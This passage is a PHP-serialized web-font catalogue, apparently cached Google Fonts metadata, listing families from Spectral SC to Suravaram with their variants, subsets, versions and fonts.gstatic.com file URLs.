SC\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs1qwkTXPYeVXJZB.ttf\";s:9:\"200italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg26zWN4O3WYZB_sU.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0OwUTXPYeVXJZB.ttf\";s:9:\"300italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg28jVN4O3WYZB_sU.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/spectralsc/v11/KtkpALCRZonmalTgyPmRfvWi6WDfFpuc.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/spectralsc/v11/KtkrALCRZonmalTgyPmRfsWg42T9E4ucRY8.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs1WwETXPYeVXJZB.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg25DUN4O3WYZB_sU.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs16x0TXPYeVXJZB.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg27zTN4O3WYZB_sU.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0exkTXPYeVXJZB.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg29jSN4O3WYZB_sU.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk0ALCRZonmalTgyPmRfs0CxUTXPYeVXJZB.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/spectralsc/v11/Ktk2ALCRZonmalTgyPmRfsWg28TRN4O3WYZB_sU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1291;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Spicy Rice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/spicyrice/v21/uK_24rSEd-Uqwk4jY1RyGv-2WkowRcc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1292;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Spinnaker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/spinnaker/v17/w8gYH2oyX-I0_rvR6Hmn3HwLqOqSBg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1293;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Spirax\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/spirax/v21/buE3poKgYNLy0F3cXktt-Csn-Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1294;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Splash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/splash/v1/KtksAL2RZoDkbU6hpPPGNdS6wg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1295;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Spline Sans\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:95:\"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpZlnYEtvlUfE2kw.ttf\";s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpOFnYEtvlUfE2kw.ttf\";s:3:\"500\";s:95:\"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRpClnYEtvlUfE2kw.ttf\";s:3:\"600\";s:95:\"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRp5l7YEtvlUfE2kw.ttf\";s:3:\"700\";s:95:\"http://fonts.gstatic.com/s/splinesans/v8/_6_sED73Uf-2WfU2LzycEZousNzn1a1lKWRp317YEtvlUfE2kw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1296;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Spline Sans Mono\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGA8MrtVy4d4dGb1.ttf\";s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGBiMrtVy4d4dGb1.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGBQMrtVy4d4dGb1.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGC8NbtVy4d4dGb1.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70MjzAei_CDNLfgZxrW6wrZOF2WdZ6xabUGSVtNuGCFNbtVy4d4dGb1.ttf\";s:9:\"300italic\";s:108:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcQ0WwYNacXb12MM.ttf\";s:6:\"italic\";s:108:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcVMWwYNacXb12MM.ttf\";s:9:\"500italic\";s:108:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcWEWwYNacXb12MM.ttf\";s:9:\"600italic\";s:108:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcY0RwYNacXb12MM.ttf\";s:9:\"700italic\";s:108:\"http://fonts.gstatic.com/s/splinesansmono/v4/R70yjzAei_CDNLfgZxrW6wrZOF2WX5eDlm1vIsHjv3WqcbQRwYNacXb12MM.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1297;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Squada One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/squadaone/v14/BCasqZ8XsOrx4mcOk6MtWaA8WDBkHgs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1298;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Square Peg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/squarepeg/v2/y83eW48Nzw6ZlUHc-phrBDHrHHfrFPE.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1299;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Sree Krushnadevaraya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/sreekrushnadevaraya/v21/R70FjzQeifmPepmyQQjQ9kvwMkWYPfTA_EWb2FhQuXir.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1300;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Sriracha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/sriracha/v10/0nkrC9D4IuYBgWcI9ObYRQDioeb0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1301;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Srisakdi\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/srisakdi/v16/yMJRMIlvdpDbkB0A-jq8fSx5i814.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/srisakdi/v16/yMJWMIlvdpDbkB0A-gIAUghxoNFxW0Hz.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1302;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Staatliches\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/staatliches/v11/HI_OiY8KO6hCsQSoAPmtMbectJG9O9PS.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1303;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Stalemate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/stalemate/v20/taiIGmZ_EJq97-UfkZRpuqSs8ZQpaQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1304;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Stalinist One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v54\";s:12:\"lastModified\";s:10:\"2022-09-08\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/stalinistone/v54/MQpS-WezM9W4Dd7D3B7I-UT7eZ-UPyacPbo.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1305;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Stardos Stencil\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/stardosstencil/v15/X7n94bcuGPC8hrvEOHXOgaKCc2TR71R3tiSx0g.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/stardosstencil/v15/X7n44bcuGPC8hrvEOHXOgaKCc2TpU3tTvg-t29HSHw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1306;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Stick\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/stick/v15/Qw3TZQpMCyTtJSvfvPVDMPoF.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1307;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Stick No Bills\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"sinhala\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVP8Q7KriwKhcTKA.ttf\";s:3:\"300\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcV4cQ7KriwKhcTKA.ttf\";s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVv8Q7KriwKhcTKA.ttf\";s:3:\"500\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVjcQ7KriwKhcTKA.ttf\";s:3:\"600\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVYcM7KriwKhcTKA.ttf\";s:3:\"700\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVWMM7KriwKhcTKA.ttf\";s:3:\"800\";s:101:\"http://fonts.gstatic.com/s/sticknobills/v8/bWts7ffXZwHuAa9Uld-oEK4QKlxj9f9t_7uEmjcVP8M7KriwKhcTKA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1308;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Stint Ultra Condensed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/stintultracondensed/v21/-W_gXIrsVjjeyEnPC45qD2NoFPtBE0xCh2A-qhUO2cNvdg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1309;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Stint Ultra Expanded\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/stintultraexpanded/v20/CSRg4yNNh-GbW3o3JkwoDcdvMKMf0oBAd0qoATQkWwam.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1310;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Stoke\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/stoke/v22/z7NXdRb7aTMfKNvFVgxC_pjcTeWU.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/stoke/v22/z7NadRb7aTMfKONpfihK1YTV.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1311;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Strait\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/strait/v13/DtViJxy6WaEr1LZzeDhtkl0U7w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1312;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Style Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/stylescript/v7/vm8xdRX3SV7Z0aPa88xzW5npeFT76NZnMw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1313;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Stylish\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/stylish/v20/m8JSjfhPYriQkk7-fo35dLxEdmo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1314;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Sue Ellen Francisco\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/sueellenfrancisco/v16/wXK3E20CsoJ9j1DDkjHcQ5ZL8xRaxru9ropF2lqk9H4.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1315;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Suez One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/suezone/v11/taiJGmd_EZ6rqscQgNFJkIqg-I0w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1316;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Sulphur Point\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/sulphurpoint/v14/RLpkK5vv8KaycDcazWFPBj2afVU6n6kFUHPIFaU.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/sulphurpoint/v14/RLp5K5vv8KaycDcazWFPBj2aRfkSu6EuTHo.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/sulphurpoint/v14/RLpkK5vv8KaycDcazWFPBj2afUU9n6kFUHPIFaU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1317;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Sumana\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/sumana/v10/4UaDrE5TqRBjGj-G8Bji76zR4w.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/sumana/v10/4UaArE5TqRBjGj--TDfG54fN6ppsKg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1318;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Sunflower\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-06MfiqYsGBGBzCw.ttf\";s:3:\"500\";s:79:\"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-0sMbiqYsGBGBzCw.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/sunflower/v14/RWmPoKeF8fUjqIj7Vc-0-MDiqYsGBGBzCw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1319;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Sunshiney\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/sunshiney/v24/LDIwapGTLBwsS-wT4vcgE8moUePWkg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1320;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Supermercado One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/supermercadoone/v22/OpNXnpQWg8jc_xps_Gi14kVVEXOn60b3MClBRTs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1321;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Sura\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/sura/v15/SZc23FL5PbyzFf5UWzXtjUM.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/sura/v15/SZc53FL5PbyzLUJ7fz3GkUrS8DI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1322;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Suranna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/suranna/v13/gokuH6ztGkFjWe58tBRZT2KmgP0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1323;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Suravaram\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/suravaram/v21/_gP61R_usiY7SCym4xIAi261Qv9roQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1324;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"S